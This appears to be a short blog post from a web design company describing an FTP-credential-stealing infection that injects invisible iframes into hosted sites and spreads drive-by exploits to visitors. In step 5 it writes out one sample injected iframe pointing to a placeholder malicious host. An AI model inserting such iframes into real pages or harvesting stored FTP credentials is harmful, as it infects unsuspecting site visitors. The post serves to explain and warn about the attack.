Being a web design company the worst nightmare is when your FTP credentials are stolen and the few hundred sites you are hosting get infected by malware of some sort.
Quite recently one of the site we were hosting got infected by a malware and everyone who opened that site was further infected by unknowingly downloading a small exploit script which stole ftp credentials and inserted a small Iframe border into each web site.Here is some explanation
1. The life cycle begins with zombie(culprit) wanting FTP credentials!
2. Here you have some FTP credentials: (From you computer/ stored passwords , firefox storage / IE storage)
3. Our zombie tries to login using the supplied FTP credentials.
4. If the login is successful,
5. He tries to inject malicious code (iframes) into .html/php files that already exist on the victim server ftp.host.tld, eg:
< iframe src=evilserver.tld/getexploits.php border=0 >
6. An unsuspecting user (“poor-guy”) visits www.host.tld; he trusts this site because he used it many times before and never experienced any problems.
7. Poor-guy gets back the normal webcontent as usual, but this time “enriched” with an invisible iframe that points to the malicious domain evilserver.tld.
8. The browser of poor-guy is now downloading the script getexploits.php on evilserver.tld…
9. But this script getexploits.php is malicious and tries to exploit several well known vulnerabilities in the browser or in installed plugins of poor-guy…
If any of those attacks is successful, the browser of poor-guy will download a trojan from evilserver.tld which turns his computer into another zombie.This zombie can now watch poor-guy’s actions, steal his bank accounts, or install other drive-by infections as in step 1 – the zombie is under control of the attacker.